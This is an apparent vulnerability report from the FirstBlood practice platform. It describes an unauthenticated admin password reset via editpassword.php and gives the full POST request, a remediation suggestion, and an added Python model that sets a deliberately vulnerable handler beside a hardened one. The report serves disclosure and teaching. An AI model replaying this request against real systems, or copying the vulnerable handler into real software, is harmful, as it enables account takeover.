FirstBlood-#1331 — Admin account takeover with editpassword
This issue was discovered on FirstBlood v3
On 2022-12-09, pichik reported:
I found that the endpoint
/drpanel/drapi/editpassword.php is still vulnerable to a bug where any user can take over any account.
In the previous version a bug which let you change the password of any user was found, and it is still not fixed!
drAdmin no longer exists; you can use the username
admin, reset the password and get access to the admin panel.
Here is the POST request:
POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: aab6a2a97295-pichik.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=6796dbc149771ac9e1a33314c
Origin: https://2cd5cf7409d3-pichik.a.firstbloodhackers.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.96.36.199 Safari/537.36
Anti-Csrf: 82985-5983-25741
Content-Length: 14

username=admin
An attacker can reset the password of any user and get access to the admin/doctor panel.
Change passwords based on cookies, not the parameter, or by sending an email to the account owner with a reset link.
FirstBlood ID: 52
Vulnerability Type: Auth issues
The endpoint /drpanel/drapi/editpassword.php still allows an unauthenticated user to change the password of any account whose username is known. The admin username was renamed from drAdmin in previous versions to admin.
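The following added example (not FirstBlood's code) models the flaw described above and the fix the report recommends: a password-change handler that trusts a `username` form field beside one that derives the account from the server-side session, re-verifies the current password and invalidates the user's other sessions. The in-memory user table, the session store keyed by the `drps` cookie, and the `password`/`current_password`/`new_password` form fields are assumptions made for illustration; the report only shows a `username=admin` body.

```python
"""Model of the editpassword flaw and a hardened handler (added example)."""
import hashlib
import hmac
import os
import secrets
from typing import Dict, Optional, Tuple

# Constructed in-memory state: username -> (salt, PBKDF2 hash), session id -> username.
USERS: Dict[str, Tuple[bytes, bytes]] = {}
SESSIONS: Dict[str, str] = {}
SESSION_COOKIE = "drps"  # assumption: this cookie carries the session id
MIN_PASSWORD_LEN = 12


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def set_password(username: str, password: str) -> None:
    """Store a fresh salt and hash for the user (creates the user if absent)."""
    salt = os.urandom(16)
    USERS[username] = (salt, _hash_password(password, salt))


def verify_login(username: str, password: str) -> bool:
    if username not in USERS:
        return False
    salt, stored = USERS[username]
    return hmac.compare_digest(stored, _hash_password(password, salt))


def login(username: str, password: str) -> Optional[str]:
    """Return a new session id on success, None otherwise."""
    if not verify_login(username, password):
        return None
    sid = secrets.token_hex(16)
    SESSIONS[sid] = username
    return sid


def editpassword_vulnerable(form: dict, cookies: dict) -> Tuple[int, str]:
    """Mirrors the reported behaviour: the target account is taken from the
    request body and the session is never consulted, so any caller can
    overwrite any user's password (assumed: new value comes from `password`)."""
    username = form.get("username", "")
    if username not in USERS:
        return 404, "no such user"
    set_password(username, form.get("password", ""))
    return 200, "password changed"


def editpassword_hardened(form: dict, cookies: dict) -> Tuple[int, str]:
    """Fix: the account is the one bound to the session cookie; the body's
    `username` field is ignored, the current password is re-checked, and
    every other session for that account is revoked."""
    sid = cookies.get(SESSION_COOKIE)
    username = SESSIONS.get(sid) if sid else None
    if username is None:
        return 401, "not authenticated"
    if not verify_login(username, form.get("current_password", "")):
        return 403, "current password incorrect"
    new_password = form.get("new_password", "")
    if len(new_password) < MIN_PASSWORD_LEN:
        return 400, "new password too short"
    set_password(username, new_password)
    for other in [s for s, u in SESSIONS.items() if u == username and s != sid]:
        del SESSIONS[other]
    return 200, "password changed"


def run_demo() -> dict:
    """Exercise both handlers on a fresh state and return the observations."""
    USERS.clear()
    SESSIONS.clear()
    set_password("admin", "admin original passphrase")
    set_password("doctor1", "doctor1 original passphrase")
    out = {}
    # Anonymous caller against the vulnerable handler: admin is taken over.
    status, _ = editpassword_vulnerable({"username": "admin", "password": "attacker chosen value"}, {})
    out["vuln_anon_status"] = status
    out["vuln_admin_taken_over"] = verify_login("admin", "attacker chosen value")
    set_password("admin", "admin original passphrase")  # restore for the next cases
    # Anonymous caller against the hardened handler: rejected outright.
    status, _ = editpassword_hardened({"username": "admin", "new_password": "attacker chosen value"}, {})
    out["hard_anon_status"] = status
    # Logged-in doctor naming admin in the body: only the doctor's own password changes.
    sid = login("doctor1", "doctor1 original passphrase")
    stale = login("doctor1", "doctor1 original passphrase")  # a second session to be revoked
    form = {"username": "admin", "current_password": "doctor1 original passphrase",
            "new_password": "doctor1 replacement passphrase"}
    status, _ = editpassword_hardened(form, {SESSION_COOKIE: sid})
    out["hard_doctor_status"] = status
    out["admin_untouched"] = verify_login("admin", "admin original passphrase")
    out["doctor_changed"] = verify_login("doctor1", "doctor1 replacement passphrase")
    out["stale_session_revoked"] = stale not in SESSIONS and sid in SESSIONS
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The point of the hardened handler is that the identity of the account being modified never comes from client-controlled input; the reset-link route the report also mentions would be a separate, token-based flow for users who cannot authenticate.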